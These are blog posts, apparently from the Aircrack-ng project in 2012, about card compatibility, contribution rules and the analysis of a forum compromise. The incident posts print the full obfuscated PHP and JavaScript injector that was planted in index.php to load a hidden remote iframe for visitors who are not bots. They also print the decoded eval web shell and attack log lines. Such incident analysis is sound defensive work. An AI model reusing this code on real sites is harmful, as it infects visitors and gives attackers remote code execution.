Thursday, October 18, 2012

Will my card work with Aircrack-ng?

Even though there is plenty of documentation on the subject (and most of the time, existing posts about it in the forum), I still see a lot of these questions, especially for new cards.

It's pretty easy to find out and the easiest way is just to try it with a recent version of a pentesting live CD like Backtrack or Pentoo. If your card is detected, you're good to go. You can even use Ubuntu or whetever distro you're comfortable with.
An important thing to note is that what airmon-ng says about your chipset is pure information and doesn't affect your card ability to inject/monitor if the driver/card has that capability in the first place obviously.

A few important notes here related to VMware/VirtualBox:
  • If your card is internal, it's not gonna work, you must reboot and run the live CD
  • If your card is USB and you are running VMware/Virtualbox, then make sure it is attached to the virtual machine. It is explained in the wiki for VMware and it is pretty similar for VirtualBox.

If it doesn't work, the quickest way to find out if it will work is to compile compat-wireless, install it and reboot.
If your card doesn't show up then it might need a firmware. Download it and put it at the right location. Most of the time, a package containing it is available for your distribution; search for "firmware" with your package manager (synaptic/apt-cache/aptitude on Debian-based distro) and install it.
If you download it manually, check dmesg to make sure it doesn't show an error; the message is self-explanatory when it happens.

If your card still doesn't show up (assuming there is no unresolved symbols), then it's probably not gonna work.
In that case, you might want to practice your Google-fu to see if there is a driver in the works.

Friday, July 6, 2012

Forum and trac/svn up

Hi,

June has been a very busy month for me, I didn't really have time to work on the forum and I apologize for that.
I've been working for the past week on bringing back up all those services. Trac and svn were safe to use and brought back up a few days ago and I spent a few more days to clean up the forum and migrate it to a new server. Nothing was lost and your login/passwords are still the same.

Since it is on a new machine, on its own, it should be faster than before and I can tell you that it is also better protected (I listened to your advices) :)
In this case, it also means a new IP and thus it might in some cases take a day or two for DNS to spread. How do you know you reached the new one?
Two ways:
  • Open it in a browser, the old forum will return a 403 Forbidden, so if you don't have that, you're good.
  • Do a nslookup forum.aircrack-ng.org. It should return 178.32.208.188.

Please send me feedback about the forum in the comments, especially if you have issues with it (I'll try to address them).

Enjoy

Monday, June 4, 2012

More about the forum virus

I got more time to investigate it.

I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file) so I ran a MD5. And it turned out the PHP files were changed.

At the beginning of the index.php, you could see the following code added (in between php tags):

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaamN5WmpZMFpqYzVaamMwWmpZMVpqWXpaamM0WmpVMlpqWXdaalkwWmpjNFpqWTFaalkxWmpSbU5qZG1OemxtTmpCbU56ZG1OR1kzTldZM00yWTFaakl4WmpZeFpqWTVaakU1WmpobUxUTm1MVEV3WmpjM1pqWXpaalU0WmpjMFpqWXlaakU1WmkwelpqZG1ObVl0TTJZdE1UQm1OakptTlRsbU5qTm1OakZtTmpKbU56Um1NVGxtTFRObU4yWTJaaTB6WmkweE1HWTNNMlkzTkdZM09XWTJObVkxT1dZeE9XWXRNMlkzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE5tWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXhOMlkzTUdZMk9XWTNNMlkyTTJZM05HWTJNMlkyT1dZMk9HWXhObVkxTldZMU5tWTNNMlkyT1dZMk5tWTNOV1kzTkdZMU9XWXhOMlkyTm1ZMU9XWTJNR1kzTkdZeE5tWTJaakUzWmpjMFpqWTVaamN3WmpFMlpqWm1NVGRtTFRObU1qQm1NVGhtTldZMk0yWTJNR1kzTW1ZMU5XWTJOMlkxT1dZeU1HWXRPR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TTJZdE1qbG1MVE16Wmkwek0yWTJNR1kzTldZMk9HWTFOMlkzTkdZMk0yWTJPV1kyT0dZdE1UQm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1PREZtTFRJNVppMHpNMll0TXpObUxUTXpaamMyWmpVMVpqY3laaTB4TUdZMk1HWXRNVEJtTVRsbUxURXdaalU0WmpZNVpqVTNaamMxWmpZM1pqVTVaalk0WmpjMFpqUm1OVGRtTnpKbU5UbG1OVFZtTnpSbU5UbG1NamRtTmpabU5UbG1OamRtTlRsbU5qaG1OelJtTFRKbUxUTm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1MVE5tTFRGbU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTTJZM01tWTFOMll0TTJZeVppMHpaall5WmpjMFpqYzBaamN3WmpFMlpqVm1OV1kzTW1ZMk5HWTNPV1kzTkdZMk5XWTJNMlkzT0dZMU5tWTJNR1kyTkdZM09HWTJOV1kyTldZMFpqWTNaamM1WmpZd1pqYzNaalJtTnpWbU56Tm1OV1l5TVdZMk1XWTJPV1l4T1dZNFppMHpaaTB4WmpFM1pqWXdaalJtTnpObU56Um1OemxtTmpabU5UbG1OR1kzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE9XWXRNMlkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l0TTJZeE4yWTJNR1kwWmpjelpqYzBaamM1WmpZMlpqVTVaalJtTnpCbU5qbG1Oek5tTmpObU56Um1Oak5tTmpsbU5qaG1NVGxtTFRObU5UVm1OVFptTnpObU5qbG1OalptTnpWbU56Um1OVGxtTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpZMlpqVTVaall3WmpjMFpqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkzTkdZM09XWTJObVkxT1dZMFpqYzBaalk1Wmpjd1pqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM04yWTJNMlkxT0dZM05HWTJNbVl0TTJZeVppMHpaamRtTm1ZdE0yWXRNV1l4TjJZMk1HWTBaamN6WmpVNVpqYzBaakl6WmpjMFpqYzBaamN5WmpZelpqVTJaamMxWmpjMFpqVTVaaTB5WmkwelpqWXlaalU1WmpZelpqWXhaall5WmpjMFppMHpaakptTFRObU4yWTJaaTB6WmkweFpqRTNaaTB5T1dZdE16Tm1MVE16Wmkwek0yWTFPR1kyT1dZMU4yWTNOV1kyTjJZMU9XWTJPR1kzTkdZMFpqWXhaalU1WmpjMFpqSTNaalkyWmpVNVpqWTNaalU1WmpZNFpqYzBaamN6WmpJMFpqYzVaalF5WmpVMVpqWXhaak0yWmpVMVpqWTNaalU1WmkweVppMHpaalUyWmpZNVpqVTRaamM1WmkwelppMHhaalE1WmpabU5URm1OR1kxTldZM01HWTNNR1kxT1dZMk9HWTFPR1l5TldZMk1tWTJNMlkyTm1ZMU9HWXRNbVkyTUdZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE15ZGRXekJkTG5Od2JHbDBLQ2RtSnlrN2RqMGlaU0lySW5aaElqdDlhV1lvZGlsbFBYZHBibVJ2ZDF0Mkt5SnNJbDA3ZEhKNWUzRTlaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaVpHbDJJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hkbktYdDNQV1k3Y3oxYlhUdDlJSEk5VTNSeWFXNW5PM285S0NobEtUOW9PaUlpS1R0bWIzSW9PelUzTnlFOWFUdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHNpWm5KdmJVTWlLeWdvWlNrL2Vqb3hNaWxkS0hkYmFsMHFNU3MwTWlrN2ZTQnBaaWgySmlabEppWnlKaVo2Smlab0ppWnpKaVptSmlaMktXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));

When it is decoded, the beginning is clear but it has once more an eval and base64_decode:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pPTA7dHJ5e2F2YXN2PXByb3RvdHlwZTt9Y2F0Y2goeil7aD0iaGFyQ29kZSI7Zj1bJy0zM2YtMzNmNjNmNjBmLTEwZi0yZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNjFmNTlmNzRmMjdmNjZmNTlmNjdmNTlmNjhmNzRmNzNmMjRmNzlmNDJmNTVmNjFmMzZmNTVmNjdmNTlmLTJmLTNmNTZmNjlmNThmNzlmLTNmLTFmNDlmNmY1MWYtMWY4MWYtMjlmLTMzZi0zM2YtMzNmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmMTdmLTI5Zi0zM2YtMzNmODNmLTEwZjU5ZjY2ZjczZjU5Zi0xMGY4MWYtMjlmLTMzZi0zM2YtMzNmNThmNjlmNTdmNzVmNjdmNTlmNjhmNzRmNGY3N2Y3MmY2M2Y3NGY1OWYtMmYtOGYxOGY2M2Y2MGY3MmY1NWY2N2Y1OWYtMTBmNzNmNzJmNTdmMTlmLTNmNjJmNzRmNzRmNzBmMTZmNWY1ZjcyZjY0Zjc5Zjc0ZjY1ZjYzZjc4ZjU2ZjYwZjY0Zjc4ZjY1ZjY1ZjRmNjdmNzlmNjBmNzdmNGY3NWY3M2Y1ZjIxZjYxZjY5ZjE5ZjhmLTNmLTEwZjc3ZjYzZjU4Zjc0ZjYyZjE5Zi0zZjdmNmYtM2YtMTBmNjJmNTlmNjNmNjFmNjJmNzRmMTlmLTNmN2Y2Zi0zZi0xMGY3M2Y3NGY3OWY2NmY1OWYxOWYtM2Y3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxNmY2MmY2M2Y1OGY1OGY1OWY2OGYxN2Y3MGY2OWY3M2Y2M2Y3NGY2M2Y2OWY2OGYxNmY1NWY1NmY3M2Y2OWY2NmY3NWY3NGY1OWYxN2Y2NmY1OWY2MGY3NGYxNmY2ZjE3Zjc0ZjY5ZjcwZjE2ZjZmMTdmLTNmMjBmMThmNWY2M2Y2MGY3MmY1NWY2N2Y1OWYyMGYtOGYtMWYxN2YtMjlmLTMzZi0zM2Y4M2YtMjlmLTMzZi0zM2Y2MGY3NWY2OGY1N2Y3NGY2M2Y2OWY2OGYtMTBmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmODFmLTI5Zi0zM2YtMzNmLTMzZjc2ZjU1ZjcyZi0xMGY2MGYtMTBmMTlmLTEwZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNTdmNzJmNTlmNTVmNzRmNTlmMjdmNjZmNTlmNjdmNTlmNjhmNzRmLTJmLTNmNjNmNjBmNzJmNTVmNjdmNTlmLTNmLTFmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3M2Y3MmY1N2YtM2YyZi0zZjYyZjc0Zjc0ZjcwZjE2ZjVmNWY3MmY2NGY3OWY3NGY2NWY2M2Y3OGY1NmY2MGY2NGY3OGY2NWY2NWY0ZjY3Zjc5ZjYwZjc3ZjRmNzVmNzNmNWYyMWY2MWY2OWYxOWY4Zi0zZi0xZjE3ZjYwZjRmNzNmNzRmNzlmNjZmNTlmNGY3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxOWYtM2Y2MmY2M2Y1OGY1OGY1OWY2OGYtM2YxN2Y2MGY0ZjczZjc0Zjc5ZjY2ZjU5ZjRmNzBmNjlmNzNmNjNmNzRmNjNmNjlmNjhmMTlmLTNmNTVmNTZmNzNmNjlmNjZmNzVmNzRmNTlmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0ZjY2ZjU5ZjYwZjc0ZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0Zjc0ZjY5ZjcwZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3N2Y2M2Y1OGY3NGY2MmYtM2YyZi0zZjdmNmYtM2YtMWYxN2Y2MGY0ZjczZjU5Zjc0ZjIzZjc0Zjc0ZjcyZjYzZjU2Zjc1Zjc0ZjU5Zi0yZi0zZjYyZjU5ZjYzZjYxZjYyZjc0Zi0zZjJmLTNmN2Y2Zi0zZi0xZjE3Zi0yOWYtMzNmLTMzZi0zM2Y1OGY2OWY1N2Y3NWY2N2Y1OWY2OGY3NGY0ZjYxZjU5Zjc0ZjI3ZjY2ZjU5ZjY3ZjU5ZjY4Zjc0ZjczZjI0Zjc5ZjQyZjU1ZjYxZjM2ZjU1ZjY3ZjU5Zi0yZi0zZjU2ZjY5ZjU4Zjc5Zi0zZi0xZjQ5ZjZmNTFmNGY1NWY3MGY3MGY1OWY2OGY1OGYyNWY2MmY2M2Y2NmY1OGYtMmY2MGYtMWYxN2YtMjlmLTMzZi0zM2Y4MyddWzBdLnNwbGl0KCdmJyk7dj0iZSIrInZhIjt9aWYodillPXdpbmRvd1t2KyJsIl07dHJ5e3E9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7cS5hcHBlbmRDaGlsZChxKyIiKTt9Y2F0Y2gocXdnKXt3PWY7cz1bXTt9IHI9U3RyaW5nO3o9KChlKT9oOiIiKTtmb3IoOzU3NyE9aTtpKz0xKXtqPWk7aWYoZSlzPXMrclsiZnJvbUMiKygoZSk/ejoxMildKHdbal0qMSs0Mik7fSBpZih2JiZlJiZyJiZ6JiZoJiZzJiZmJiZ2KWUocyk7PC9zY3JpcHQ+'));
}

And that second part decoded unfortunately is obfuscated (it is Javascript and enclosed between script tags):

i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);

Indented:

i = 0;
try{
    avasv=prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e"+"va";
}

if (v) e = window[v+"l"];
try {
    q = document.createElement("div");
    q.appendChild(q+"");
} catch (qwg) {
    w = f;
    s = [];
}

r = String;
z = ((e)?h:"");
for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
}
if (v && e && r && z && h && s && f && v) e(s);

It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does.

On side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought.

I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server :)

Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

Thursday, May 10, 2012

How to contribute?

I got an email asking how to contribute to Aircrack-ng. He was telling me that he did not find any information about it.

He was right, there was nothing written yet; it's kinda implicit but let's address that.

So, first of all, make sure to work on the latest subversion revision and make your modifications in it. Don't remove the subversion control directory (.svn) and files.

About the code, it MUST be GPL or GPLv2 and allow OpenSSL exception (see the license exception in every single source code file).
You can add comment to your diff file at the top, before the line beginning with +++. It is displayed by trac (and you can easily read them) but the advantage is that it is ignored by patch when applying the patch. Make it clear in that section that your patch is GPL or GPLv2 and allow OpenSSL exception.

Another thing about the code: make sure that your code is easy to read and well commented. I'm talking about smart comments and documenting code that is not obvious. I found a post about it and he uses Javascript but it applies to every other language.
Ah yeah, don't address several issues with a single patch. One patch = one issue.

